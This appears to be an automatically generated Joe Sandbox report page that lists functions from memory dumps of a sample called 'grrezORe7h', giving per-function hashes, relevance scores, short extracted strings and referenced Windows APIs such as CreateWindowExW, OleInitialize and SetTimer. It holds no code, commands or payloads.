Instruction ID: fb042bc4e52211ea7e55ef6e99ddb49ed3d6ac6ea552906cae82ebd584ce7301
Opcode Fuzzy Hash: d2e972211bb4e830c1f706f350ecdfc0144c9a16b7da9a52944cb80829b1c0a3
Instruction Fuzzy Hash: EA91F374D01218CFEB10DFA9C584BDDBBB1FF88305F209269E408AB291DB759989CF55

Function 36EC0C1A Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

6, xrefs: 36EC0C99

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-3617711204
Opcode ID: 7f317fee19f5d2799aa95b14f3c094ae7d7edd4b660001d042a39851b4ee297d
Instruction ID: 2b67fbb982b54127f6c63bc1b2383dad63bcd2f0d310429275d19b6ca2d7ede8
Opcode Fuzzy Hash: 7f317fee19f5d2799aa95b14f3c094ae7d7edd4b660001d042a39851b4ee297d
Instruction Fuzzy Hash: 5F910374D00208CFEB10DFA8C984BDDBBB1FF88305F209269E408AB291DB759989CF55

Function 36EC0C22 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

6, xrefs: 36EC0C99

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-3617711204
Opcode ID: e880228a5599b97d7d5bfaa26d1e49a69b92e40143cb4d29bb0735a2f78bb986
Instruction ID: 1121a06ccd5c9aaa39c4f7204cd7df150dbe421e45be85eb27943538dabc10e6
Opcode Fuzzy Hash: e880228a5599b97d7d5bfaa26d1e49a69b92e40143cb4d29bb0735a2f78bb986
Instruction Fuzzy Hash: 1C91E374D01208CFEB10DFA9C594B9DBBB1FF88305F209269E409AB291DB759985CF54

Function 373A8650 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438dfae2df85a752694a70087b372cdada8abc5d1a9558e56969c2b67d4af444
Instruction ID: 765173f4dbafd5d24f8cda8a5ae9bc0d9930a9dcfd6072a4b877187e7f5206e7
Opcode Fuzzy Hash: 438dfae2df85a752694a70087b372cdada8abc5d1a9558e56969c2b67d4af444
Instruction Fuzzy Hash: E372ACB4E012298FDB65DF69C991BD9BBB2FB49300F1091EAD40CA7251DB34AE81CF40

Function 36ECC638 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2119d1b45b2ad8b524d2a845fe325aa9f3a8e3357ed9323c6157ce92336ba795
Instruction ID: a09e801ca39cb9fc28abf1d1e1fcbcbda49b6ec58a8298b958beca099674e9ca
Opcode Fuzzy Hash: 2119d1b45b2ad8b524d2a845fe325aa9f3a8e3357ed9323c6157ce92336ba795
Instruction Fuzzy Hash: E8E1C274E01268CFDB14CFA8C954B9DBBB2BF89305F2081AAD409BB391DB355A85CF51

Function 36EC03B0 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c426d42205feea0c728f74883b7ba13e266da6b8ec3a0696e27b5a74ef9d103
Instruction ID: 77de394fba486e3818052c8701f867869e02d83678f26783d91aa6730c1c8dc5
Opcode Fuzzy Hash: 2c426d42205feea0c728f74883b7ba13e266da6b8ec3a0696e27b5a74ef9d103
Instruction Fuzzy Hash: 26C1C174E01218CFDB14DFA9C994B9DBBB2BF88301F1090AAE809AB355DB355E85DF50

Function 36EC0F6F Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16badb78442d0accc66d3fd03660e08333a9eb9cb38cdc8cbb14faa57a26b6f2
Instruction ID: 54a15bf50e40e8cb8f45dfb39e1d9bed6d59f572672978dd82f73891ffb0e78d
Opcode Fuzzy Hash: 16badb78442d0accc66d3fd03660e08333a9eb9cb38cdc8cbb14faa57a26b6f2
Instruction Fuzzy Hash: 3F91F174D00218CFEB10DFA8C988BDCBBB1FF49315F209269E409AB291DB759989CF55

Function 373ABA97 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bec61f51809d668d0112bec8aeae1dd016544706d7e545688ae02c1362139c
Instruction ID: 2e90f2b2e064680eb3931557f22fe77e8eccd6b5d718c3b495648dabf83c716c
Opcode Fuzzy Hash: 41bec61f51809d668d0112bec8aeae1dd016544706d7e545688ae02c1362139c
Instruction Fuzzy Hash: 2781F574E01248CBDB44DFAAD95169DBBF2FF88310F24D529E418AB358DB35A942CF50

Function 373A8655 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a96174e6d1cb9581363e564f65613528f5bc89e2ec15a7794d4406b412dd7c
Instruction ID: 99465759c12fc5d25bf7b7666f8de3b39b0fbd8d6d2a497a9e1f5b9266a4340c
Opcode Fuzzy Hash: 82a96174e6d1cb9581363e564f65613528f5bc89e2ec15a7794d4406b412dd7c
Instruction Fuzzy Hash: B871A475D01268CFDB65CF6AC9807DDBBB2BF89301F1091AAD408A7264DB356A86CF40

Function 001566B8 Relevance: 10.5, Strings: 8, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(odq, xrefs: 001567B1
,hq, xrefs: 00156B68
(odq, xrefs: 001567DD
(odq, xrefs: 00156BD7
,hq, xrefs: 00156B58
(odq, xrefs: 00156BC7
(odq, xrefs: 001566F6
(odq, xrefs: 0015687A

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: (odq$(odq$(odq$(odq$(odq$(odq$,hq$,hq
API String ID: 0-1376594924
Opcode ID: 9d7a95147a75131c14bbecd4bd2ce6ae438fa4ae1394b1d8d1c17e13e7bd528a
Instruction ID: b90ff98bbb3d48bf00e874fa022889217f35bd2a2add5f9f719acecba41d6500
Opcode Fuzzy Hash: 9d7a95147a75131c14bbecd4bd2ce6ae438fa4ae1394b1d8d1c17e13e7bd528a
Instruction Fuzzy Hash: 2C126B30A00208DFCB14CF69D994AAEBBF2FF48316F558559E869DB261DB30ED45CB90

Function 001519B8 Relevance: 8.2, Strings: 6, Instructions: 686
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xhq, xrefs: 00152CBE
Xhq, xrefs: 00152C95
Xhq, xrefs: 00151A76
Xhq, xrefs: 00151B2F
Xhq, xrefs: 00151AB0
Xhq, xrefs: 00151B7C

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: Xhq$Xhq$Xhq$Xhq$Xhq$Xhq
API String ID: 0-2119377026
Opcode ID: 647034e0484a14dc89bf08b8a6b95ac606171d804d58eb82e66fa6d916ebb3d0
Instruction ID: d286467f5a868808ef43a2f02486a5df921961cf3ef2b252acb066f2b342f753
Opcode Fuzzy Hash: 647034e0484a14dc89bf08b8a6b95ac606171d804d58eb82e66fa6d916ebb3d0
Instruction Fuzzy Hash: E542DAA7E1D3E18FCB124B705CB82597FB17B62106BEE458EC8C297283EBA94445C352

Function 377D0980 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 377D09FE
GetCurrentThread.KERNEL32 ref: 377D0A3B
GetCurrentProcess.KERNEL32 ref: 377D0A78
GetCurrentThreadId.KERNEL32 ref: 377D0AD1

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a71b964aec369ad8c144ee5e0267eb41e3b8713c729721607bb8808f20fee034
Instruction ID: b92326cf6dbc27590540615713cc012e1700877ebf6fa1774e8a6d5ed0f3e9e0
Opcode Fuzzy Hash: a71b964aec369ad8c144ee5e0267eb41e3b8713c729721607bb8808f20fee034
Instruction Fuzzy Hash: D35148B49003099FDB04DFAAC548B9EBBF5EF88310F20C45AE459B7261DB34A981CF65

Function 373AD548 Relevance: 5.2, Strings: 4, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'dq, xrefs: 373AD5ED
dr07, xrefs: 373AD56D
4'dq, xrefs: 373AD5CA
)67, xrefs: 373AD67C

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq$dr07$)67
API String ID: 0-1175389036
Opcode ID: 5eb5773fab2a60b575a3c5a88a8bcfd98731e94e8f669eedbf5049589922e429
Instruction ID: 899076980800ca13d4015420dfaa0f3e26f9c04f749dddaf5999fce616f62dc5
Opcode Fuzzy Hash: 5eb5773fab2a60b575a3c5a88a8bcfd98731e94e8f669eedbf5049589922e429
Instruction Fuzzy Hash: 0A518270A002499FCB05DFA8D995AEEBBB2FF85301F108569E009BB266DB35AD41CF51

Function 373A7920 Relevance: 3.9, Strings: 3, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<C07, xrefs: 373A7B22
<C07, xrefs: 373A7AEB
<C07, xrefs: 373A79D4

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: <C07$<C07$<C07
API String ID: 0-1182896189
Opcode ID: 2908526cd94070ae52345953b5f3205c888c08a011b89cecb90c430ebcee5ad0
Instruction ID: d5c43df0e21dafe24ede51de918257671f0fd1c0a39aa7f779d03f2cb9bdad4c
Opcode Fuzzy Hash: 2908526cd94070ae52345953b5f3205c888c08a011b89cecb90c430ebcee5ad0
Instruction Fuzzy Hash: DC5102B4D01318DFDB14DFA5C954B9DBBB2FF89301F60812AE809AB255DB356A86CF40

Function 377DC4D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 377DD445

Strings

`w~7, xrefs: 377DC4E4

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: Initialize
String ID: `w~7
API String ID: 2538663250-1121822653
Opcode ID: 3a19917747587595819822e74688521b1d71366263796d374fb226b4bb64f3d1
Instruction ID: 2b3b00ceaf7b366a2b873581edb5d45675c7bd84103d4d37201c241df551a2be
Opcode Fuzzy Hash: 3a19917747587595819822e74688521b1d71366263796d374fb226b4bb64f3d1
Instruction Fuzzy Hash: 591173B0800348CFDB10DFAAD448BDEBBF4EB48320F20885AD548AB301C774A945CBA5

Function 00154F00 Relevance: 2.8, Strings: 2, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hhq, xrefs: 0015501E
Hhq, xrefs: 00154FEB

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: Hhq$Hhq
API String ID: 0-2450388649
Opcode ID: b92e2ae6820962fec056920e69860bad20ebf907bcbf76fb801720126ecaab10
Instruction ID: 345843d9c1c947d779bcf695406360930b58f2fef00ac557de09c4e935026f73
Opcode Fuzzy Hash: b92e2ae6820962fec056920e69860bad20ebf907bcbf76fb801720126ecaab10
Instruction Fuzzy Hash: 04B1AE34304614CFCB159F39C864B6A7BE2AF88306F158569E91ACF2A5CB74CC85DB91

Function 00155460 Relevance: 2.7, Strings: 2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,hq, xrefs: 00155540
,hq, xrefs: 00155536

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: ,hq$,hq
API String ID: 0-3475114797
Opcode ID: 6187d6a0d18473a79f30999f965d20a44d06abad836bf595dad8e8d1a195b5c2
Instruction ID: fdc085c50cb00060190fc20b276270ed713861b020ae55b6f928e75102e671f9
Opcode Fuzzy Hash: 6187d6a0d18473a79f30999f965d20a44d06abad836bf595dad8e8d1a195b5c2
Instruction Fuzzy Hash: 18818D74A10945CFCB14CF69C4A49AAB7B3BF88316B658069E825DF361EB31EC45CB50

Function 00150B29 Relevance: 2.7, Strings: 2, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`'V4, xrefs: 00150B7A
LRdq, xrefs: 00150B62

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: LRdq$`'V4
API String ID: 0-2300282449
Opcode ID: f18398aca40412fba2f4317fd5e79984ae84fdcbb7d9160e67d03bb07a26bb60
Instruction ID: d2107e0d3ffaac3e96ca263bb1c57b2136ae16e381fca7ca608092616f2bb697
Opcode Fuzzy Hash: f18398aca40412fba2f4317fd5e79984ae84fdcbb7d9160e67d03bb07a26bb60
Instruction Fuzzy Hash: 39A1C674A10259CFCB04DFA8E99499DBBB1FB58302B10562AF409BB365DF346D86CF80

Function 00150B30 Relevance: 2.7, Strings: 2, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`'V4, xrefs: 00150B7A
LRdq, xrefs: 00150B62

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: LRdq$`'V4
API String ID: 0-2300282449
Opcode ID: 6d35a9c0d159d27a4d099f7973312d6997a78bd8ae31c074b2cef1df882dec4c
Instruction ID: 5bb2dbd47e4c9e1735b16b5dd431c9b42287022ea6eaa6d2cd2f2fc701fb84ae
Opcode Fuzzy Hash: 6d35a9c0d159d27a4d099f7973312d6997a78bd8ae31c074b2cef1df882dec4c
Instruction Fuzzy Hash: DFA1C774A10259DFCB04DFA8E99499DBBB1FB58302B10562AF409BB365DF346D86CF80

Function 373A7922 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

<C07, xrefs: 373A7B22
<C07, xrefs: 373A7AEB

Memory Dump Source

Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd

Similarity

API ID:
String ID: <C07$<C07
API String ID: 0-2744721049
Opcode ID: b8b0ba7e43e4227f7671888467cfdce3e24fcd15f4ec1860d39061d4023e2c0c
Instruction ID: 52665857edfc54c66cb0c971be74ab237ff425d1bfbdf0ffa9bb47dc57a57af8
Opcode Fuzzy Hash: b8b0ba7e43e4227f7671888467cfdce3e24fcd15f4ec1860d39061d4023e2c0c
Instruction Fuzzy Hash: 5A2133B0D02318DFEB00CFA5D4447EEBBB2AF89300F50842AD419BB254EB755A8ACF40

Function 00158D19 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'dq, xrefs: 00158D44
4'dq, xrefs: 00158D2D

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq
API String ID: 0-2306408947
Opcode ID: cadc4938f207b1eedb31c2de74ff9873111e878ddbe94041d79353826043afad
Instruction ID: 7b5ffdfdda3f6ad47eaa58d80a5cefaf57853e65472600da6c18329693099953
Opcode Fuzzy Hash: cadc4938f207b1eedb31c2de74ff9873111e878ddbe94041d79353826043afad
Instruction Fuzzy Hash: 76F04F353002146FDB085AAA985597B7ADBEFD83A2B148429FD1DCB391DE71CC0187A0

Function 377D00C5 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 377D0222

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bf51363bccba015036ab6b5e010cd9e1f7c330ec25c1438376b273e28d56319a
Instruction ID: 6bc0581c981ea112f2cf02e226cc7103eec5e7373f05581dd1ba59512b28868b
Opcode Fuzzy Hash: bf51363bccba015036ab6b5e010cd9e1f7c330ec25c1438376b273e28d56319a
Instruction Fuzzy Hash: 6D51F0B1C00349AFDF05CF99C984ACEBFB6BF48310F24852AE818AB220D771A841CF50

Function 377D0104 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 377D0222

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5b8ca21bcaaac72cf17ba9460d72c77f446adaffe507c0cc5eab4712e9448421
Instruction ID: b0536f3509fa8e471f7c5f034d62d82e5a30bfa496e6045cfa49aec5040756cf
Opcode Fuzzy Hash: 5b8ca21bcaaac72cf17ba9460d72c77f446adaffe507c0cc5eab4712e9448421
Instruction Fuzzy Hash: C551D0B5D00309EFDB14CF99C984ADEFBB6BF48310F60852AE818AB210D771A941CF91

Function 377D0110 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 377D0222

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9cef3dc2218f5d7fb0298f8c24bbc1d8d56bd21a603d8446803f1c1803099e2e
Instruction ID: f8bf44388a146205a914b421b36da437a73505a29579fc6667d482cd42cefd8b
Opcode Fuzzy Hash: 9cef3dc2218f5d7fb0298f8c24bbc1d8d56bd21a603d8446803f1c1803099e2e
Instruction Fuzzy Hash: 3741C2B5D00309DFDB14CF99C984ADEBBB5FF48310F60852AE818AB210D771A945CF91

Function 377D1DC0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 377D1E81

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 00c8f7f9444697ba0acb320d55bf1f41eeea400847f0645da9e6ad9193aa4fe4
Instruction ID: 855a74faf19d85b4bcf8d6ba1040b9202f67b73379c1b191372555f1be7b224a
Opcode Fuzzy Hash: 00c8f7f9444697ba0acb320d55bf1f41eeea400847f0645da9e6ad9193aa4fe4
Instruction Fuzzy Hash: A14116B8900309DFDB14CF99C848A9AFBF6FF88311F25C859D519AB321D734A841CBA0

Function 377D0BC0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 377D0C4F

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a62207fa79e643503018ef376da2b8a435f671e7fb6c12fb5b79fb5247acbcc8
Instruction ID: 98c5c87146c934d5b1795ec62249a5a2b3d2fc21c1782904cbe9656c36008d9a
Opcode Fuzzy Hash: a62207fa79e643503018ef376da2b8a435f671e7fb6c12fb5b79fb5247acbcc8
Instruction Fuzzy Hash: 5321E4B5900349AFDB10CFAAD984ADEFFF4EB48320F24841AE958A7311D374A950CF65

Function 377D0BC8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 377D0C4F

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f13a7c6db9ef06c402961cbb05fba55450bd1d7eb85d612ba289f6e78920dfe3
Instruction ID: 052ea246d1abfcde7e5f7e7400d7ea3fde2164266b5bc48f7ade1d5b4eb84ba5
Opcode Fuzzy Hash: f13a7c6db9ef06c402961cbb05fba55450bd1d7eb85d612ba289f6e78920dfe3
Instruction Fuzzy Hash: 4021F5B5900308AFDB10CFAAD984ADEFFF4EB48320F14841AE958A7310D374A940CF65

Function 377D2018 Relevance: 1.5, APIs: 1, Instructions: 48timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,?,?), ref: 377D207D

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 08dadf0344f4754ffac8707f4422126ba91e9cb9feace60e545cadd515bdc7b7
Instruction ID: 9b259ab100d21385c51f2eb2e4d978aff2e232bd522c2b34adf36ce491b648af
Opcode Fuzzy Hash: 08dadf0344f4754ffac8707f4422126ba91e9cb9feace60e545cadd515bdc7b7
Instruction Fuzzy Hash: C51136B58003489FDB20DF9AC844BDEBFF8EB48320F20881AD558A7210C375A544CFA1

Function 377DE700 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 377DE765

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 3688a8c15c1575de0d972d0830f40e513fee8cdebd72180169c40dd5ec153c39
Instruction ID: f5921a8432539e690766e4abec39abaa5fde4913cf9b95b48796bff7fa3bc326
Opcode Fuzzy Hash: 3688a8c15c1575de0d972d0830f40e513fee8cdebd72180169c40dd5ec153c39
Instruction Fuzzy Hash: 9A11FEB5C007498FCB10DFAAD945BDEBBF4EB48324F20882AD458A7650C778A545CFA6

Function 377DC560 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 377DD445

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 97518295c41eae950e89a4cbd0ade5a4a4eddffa08a664836894cf60c5977dc6
Instruction ID: 887439813a7a7e14ee10b261c61ba778d021b24d23d29638a4fecf9ef4bc5e69
Opcode Fuzzy Hash: 97518295c41eae950e89a4cbd0ade5a4a4eddffa08a664836894cf60c5977dc6
Instruction Fuzzy Hash: 541103B5900348CFCB10DFAAC549B9EBBF4EB48320F20885AD658A7210D775A944CBA5

Function 377DD3E8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 377DD445

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 82136ea31593d4ab7ddb123a4b2a5ea805d29077e9974b15aad9de72303a4b0e
Instruction ID: fada846efe4ef5dba73bd759d7253d0b9a08e37f3a8406615cdb8d4132bee67b
Opcode Fuzzy Hash: 82136ea31593d4ab7ddb123a4b2a5ea805d29077e9974b15aad9de72303a4b0e
Instruction Fuzzy Hash: 3C1115B5800748CFCB10DFAAC549BCEBFF4EB48320F20885AD559A7611C775A545CFA6

Function 377D2020 Relevance: 1.5, APIs: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,?,?), ref: 377D207D

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 3a140dda87cee1c318f0c0426b176f0e0f57899b2e5753fa5dbe8abf1139cc58
Instruction ID: 0b6d2e9ac97929d69a979860929c6ae8d3823bf9b12907a513b9347f1d7110ad
Opcode Fuzzy Hash: 3a140dda87cee1c318f0c0426b176f0e0f57899b2e5753fa5dbe8abf1139cc58
Instruction Fuzzy Hash: AF11E5B58003499FDB10DF9AD945BDEFBF8EB48320F20881AD559A7610C375A584CFA5

Function 377DE708 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 377DE765

Memory Dump Source

Source File: 00000004.00000002.3015164928.00000000377D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_377d0000_grrezORe7h.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 8a11504824262f5279122e70b447971303d1f8050badaf2bd77066eb32930805
